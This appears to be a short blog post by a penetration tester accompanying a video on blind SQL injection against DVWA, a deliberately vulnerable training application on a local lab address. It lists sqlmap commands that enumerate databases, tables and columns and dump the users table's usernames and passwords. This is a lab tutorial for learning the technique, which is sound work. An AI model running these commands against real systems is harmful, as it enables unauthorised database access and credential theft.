Blind SQL Injection on DVWA using SQLMap

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Here is a video showing you how to perform and Blind SQL injection the vulnerable application is called DVWA and can be downloaded from the following address: http://www.dvwa.co.uk/

The commands I have used can be found below this video

sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" 
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" --dbs
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -D dvwa --tables
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -T users --column
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -C user,password --dump
The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]